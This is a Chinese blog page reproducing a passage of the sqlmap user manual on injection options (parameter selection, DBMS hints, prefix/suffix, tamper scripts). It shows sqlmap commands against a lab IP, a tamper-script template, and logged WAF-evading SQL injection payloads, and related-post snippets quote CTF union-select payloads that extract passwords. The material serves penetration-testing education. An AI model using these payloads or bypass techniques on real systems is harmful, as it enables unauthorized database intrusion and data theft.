sqlmap用户手册(四)——注入

最新推荐文章于 2024-06-30 08:30:45 发布
最新推荐文章于 2024-06-30 08:30:45 发布
阅读量1.8k 收藏
点赞数
分类专栏: 安全相关

注入

测试参数

参数:-p,--skip

sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。但是你可以手动用-p参数设置想要测试的参数。例如: -p "id,user-anget"

当你使用--level的值很大但是有个别参数不想测试的时候可以使用--skip参数。

例如:--skip="user-angent.referer"

在有些时候web服务器使用了URL重写,导致无法直接使用sqlmap测试参数,可以在想测试的参数后面加*

例如:

python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

sqlmap将会测试value1的位置是否可注入。

指定数据库

参数:--dbms

默认情况系sqlmap会自动的探测web应用后端的数据库是什么,sqlmap支持的数据库有:

MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAP MaxDB、DB2

指定数据库服务器系统

参数:--os

默认情况下sqlmap会自动的探测数据库服务器系统,支持的系统有:Linux、Windows。

指定无效的大数字

参数:--invalid-bignum

当你想指定一个报错的数值时,可以使用这个参数,例如默认情况系id=13,sqlmap会变成id=-13来报错,你可以指定比如id=9999999来报错。

只定无效的逻辑

参数:--invalid-logical

原因同上,可以指定id=13把原来的id=-13的报错改成id=13 AND 18=19。

注入payload

参数:--prefix,--suffix

在有些环境中,需要在注入的payload的前面或者后面加一些字符,来保证payload的正常执行。

例如,代码中是这样调用数据库的:

$query = "SELECT * FROM users WHERE id=(’" . $_GET[’id’] . "’) LIMIT 0, 1";

这时你就需要--prefix和--suffix参数了:

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "’)" --suffix "AND (’abc’=’abc"

这样执行的SQL语句变成:

$query = "SELECT * FROM users WHERE id=(’1’) <PAYLOAD> AND (’abc’=’abc’) LIMIT 0, 1";

修改注入的数据

参数:--tamper

sqlmap除了使用CHAR()函数来防止出现单引号之外没有对注入的数据修改,你可以使用--tamper参数对数据做修改来绕过WAF等设备。

下面是一个tamper脚本的格式:

# Needed imports
from lib.core.enums import PRIORITY
# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL
def tamper(payload):
    '''
    Description of your tamper script
    '''
    retVal = payload
    # your code to tamper the original payload
    # return the tampered payload
    return retVal

可以查看 tamper/ 目录下的有哪些可用的脚本

例如:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

[hh:mm:03] [DEBUG] cleaning up configuration parameters
[hh:mm:03] [INFO] loading tamper script 'between'
[hh:mm:03] [INFO] loading tamper script 'randomcase'
[hh:mm:03] [INFO] loading tamper script 'space2comment'
[...]
[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
[...]
[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar(
58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/
ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/
group/**/bY/**/x)a)
[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING
clause' injectable
[...]
「已注销」
关注
专栏目录
Web渗透测试之SQL注入:Level4--人与工具
vodkaDL的博客
11-03 317
文章目录前言题目分析人与工具总结 前言 题目分析 题目首页如下:   现在的你可以说的上是经验丰富了,看到这你立马输入了一个 ‘ ,但接下来的一幕顿时让你傻眼了,竟然没有报错:   你顿时怀疑是不是哪里出错了,于是又重新输入了一次,结果还是和上次一样,虽然你有所怀疑,但你还是接着尝试输入了 and 1=1 、and 1=2,和 and ‘1’='1 、and ‘1’='2 ,竟然都没有报错:   你现在感到非常的迷惑,为什么都没有报错呢,究竟是哪里出了问题?想来想去你唯一能想到的解释就是网站
sqlmap4burp-plus-plus-重新编译github上的jar包全过程
zijiaijd的博客
07-09 346
环境 为什么要重新编译 github上下载的sqlmapburp插件 乱码问题 过程 下载源码 使用javaidie打开 图就不截了 然后安装插件 这个插件我真的就不知道怎么弄出来的了 结果测试发现是 我一开始打开的时候是没有的,后面就有了,会在右下提示,记得打开就行了 打开的窗口 下面这个红框就相当于mvn package 双击即可 修改源程序过程 第一:找程序开始 全部翻一遍会发现SqlmapStarter这个java 基本上就是从这里进入windows 程序判断, 可以判断出第16行就是cm
sqlmap常用参数及示例
最新发布
开源优测
06-30 429
关注开源优测不迷路大数据测试过程、策略及挑战测试框架原理,构建成功的基石在自动化测试工作之前,你应该知道的10条建议在自动化测试中,重要的不是工具以下是 sqlmap 的一些常用 API(参数)及其示例用法:sqlmap 常用参数列表目标设定 - -d: 针对一个数据库管理系统的用户提供的 SQL 语句。 sqlmap -d "mssql://sa:password@localhost/Dat...
SQLMap 使用参数详解
热门推荐
qq_37019068的博客
10-09 1万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
sqlmap参数大全
卖瓜小农的博客
02-23 8572
sqlmap参数大全 cookie注入sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data “指定参数” 绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper space2morehash.
sqlmap详细的参数功能介绍(全面)
weixin_46709219的博客
11-13 5680
目录 介绍 命令参数 指定目标 直连数据库 服务型数据库(前提知道数据库用户名和密码) 文件型数据库(前提知道数据库绝对路径) URL探测 文件读取目标 Google dork注入 Http参数 设置请求方法 POST提交参数 设置参数分隔符 设置Cookie 设置User-Agent Host Referer 额外的HTTP头部 协议认证 设置代理 Tor匿名网络 设置...
sqlmap中文手册.pdf
08-13
技术——sqlmap 支持的 SQL 注入技术 特性——支持的特性列表 下载更新——更新你的 sqlmap 副本 相关依赖——关于第三方库和工具的信息 历史——从 2006 到 2017 用法——所有选项和开关的详尽解释,包含相应实例。...
sql注入————ctfshowsql注入
qq_45655564的博客
06-07 1932
web171 -1’ union select 1,2,password from ctfshow_web.ctfshow_user–+ web172 -1’ union select 2,password from ctfshow_user2–+ web173 -1’ union select 1,2,password from ctfshow_user3–+ web174 -1’ union select ‘a’,replace(replace(replace(replace(replace(repla
1、SQL注入模块——DVWA
qwsn
01-20 2734
0x01、DVWA环境的搭建(Linux版本)(用到了VMwareworkstations)
CTF学习笔记——sql注入(2)
Obs_cure的博客
08-16 599
一、[SUCTF 2019]EasySQL 看标题就知道是关于sql注入的题目。老规矩,先跑一下sqlmap,再用1’ or 1=1 #试试。 全部木大了…看writeup吧…
Java基础学习总结(98)——阿里巴巴Java开发手册
科技D人生
02-16 2041
Java开发手册     版本号 制定团队 更新日期 备  注   1.0.0 阿里巴巴集团技术部 2016.12.7 首次向Java业界公开       一、编程规约 (一) 命名规约 1.   【强制】所有编
sql注入扫描_sqlmap-1.1.3.zip
02-13
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了
sqlmap无法连接到目标url解决方法
m0_54108779的博客
05-19 4283
sqlmap无法连接到目标url解决方法 1.先进ROOT用户,不然你没办法删除 sqlmap 2.删除SQLMAP 3.安装SQLMAP git clone https://github.com/sqlmapproject/sqlmap
SQLmap参数详解
Williamanddog的博客
01-19 5594
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存url,sqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1258
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
SQLMAP详细介绍之参数详解
yuchen的博客
01-16 1783
SQLMAP参数详解option 选项target 目标Request 请求Optimization 优化Injection 注入Detection 侦察Techniques 技巧Fingerprint 指纹Enumeration 枚举Brute force 暴力User-defined function injection 用户自定义注入函数File system access 访问文件系统Operating system access 操作系统连接windows 注册表连接通用参数和混杂选项 optio
sqlmap命令详解
Pitbull2014的博客
12-20 1182
cookie注入sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sqlmap)【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型
05-26 1012
【sqllabs靶场】sqlmap
Sqlmap手册—史上最全
城下深蓝的博客
04-28 943
sqlmap手册——史上最全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值